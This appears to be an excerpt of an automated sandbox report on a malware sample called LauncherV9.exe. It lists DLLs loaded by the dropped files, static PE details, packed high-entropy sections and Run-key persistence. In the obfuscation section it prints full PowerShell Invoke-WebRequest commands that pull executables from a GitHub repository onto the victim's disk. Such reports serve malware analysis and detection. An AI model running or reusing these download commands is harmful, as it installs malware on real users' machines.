            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\Service.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\LauncherV9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: LauncherV9.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: LauncherV9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: LauncherV9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: LauncherV9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: LauncherV9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: LauncherV9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: LauncherV9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: LauncherV9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: LauncherV9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Users\danar\source\repos\opretorsa\x64\Release\opretorsa.pdb source: LauncherV9.exe
            Source: Binary string: \LoaderV2\ClientLoader\x64\Release\ClientLoader.pdb) source: Service.exe, 00000016.00000000.1448891266.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000016.00000002.2513871933.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000002.2514078323.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000000.1545689250.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000002.2513823440.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000000.1629513187.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe.18.dr
            Source: Binary string: C:\Users\danar\source\repos\opretorsa\x64\Release\opretorsa.pdb5 source: LauncherV9.exe
            Source: Binary string: \LoaderV2\ClientLoader\x64\Release\ClientLoader.pdb source: Service.exe, 00000016.00000000.1448891266.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000016.00000002.2513871933.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000002.2514078323.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000000.1545689250.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000002.2513823440.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000000.1629513187.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe.18.dr
            Source: LauncherV9.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: LauncherV9.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: LauncherV9.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: LauncherV9.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: LauncherV9.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Source: C:\zjxbeopkqt\jaclo.exeUnpacked PE file: 13.2.jaclo.exe.ba0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
            Source: C:\Users\user\AppData\Local\dll.exeUnpacked PE file: 16.2.dll.exe.370000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'"
            Source: jaclo.exe.12.drStatic PE information: section name:
            Source: jaclo.exe.12.drStatic PE information: section name:
            Source: jaclo.exe.12.drStatic PE information: section name:
            Source: jaclo.exe.12.drStatic PE information: section name:
            Source: jaclo.exe.12.drStatic PE information: section name:
            Source: dll.exe.15.drStatic PE information: section name:
            Source: dll.exe.15.drStatic PE information: section name:
            Source: dll.exe.15.drStatic PE information: section name:
            Source: dll.exe.15.drStatic PE information: section name:
            Source: dll.exe.15.drStatic PE information: section name:
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_02DC3B0C push 0000004Ah; ret 13_2_02DC3B16
            Source: jaclo.exe.12.drStatic PE information: section name: entropy: 7.998753579319093
            Source: jaclo.exe.12.drStatic PE information: section name: entropy: 7.9311662605480695
            Source: jaclo.exe.12.drStatic PE information: section name: entropy: 7.984838484844144
            Source: jaclo.exe.12.drStatic PE information: section name: entropy: 7.93829362522864
            Source: jaclo.exe.12.drStatic PE information: section name: .data entropy: 7.979686481510892
            Source: dll.exe.15.drStatic PE information: section name: entropy: 7.9983277202062215
            Source: dll.exe.15.drStatic PE information: section name: entropy: 7.933316038649036
            Source: dll.exe.15.drStatic PE information: section name: entropy: 7.97356418076342
            Source: dll.exe.15.drStatic PE information: section name: entropy: 7.915545219072036
            Source: dll.exe.15.drStatic PE information: section name: .data entropy: 7.985616138613135
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Service.exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\zjxbeopkqt\jaclo.exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\dll.exeJump to dropped file
            Source: C:\Users\user\Desktop\LauncherV9.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FileAutostartJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FileAutostartJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
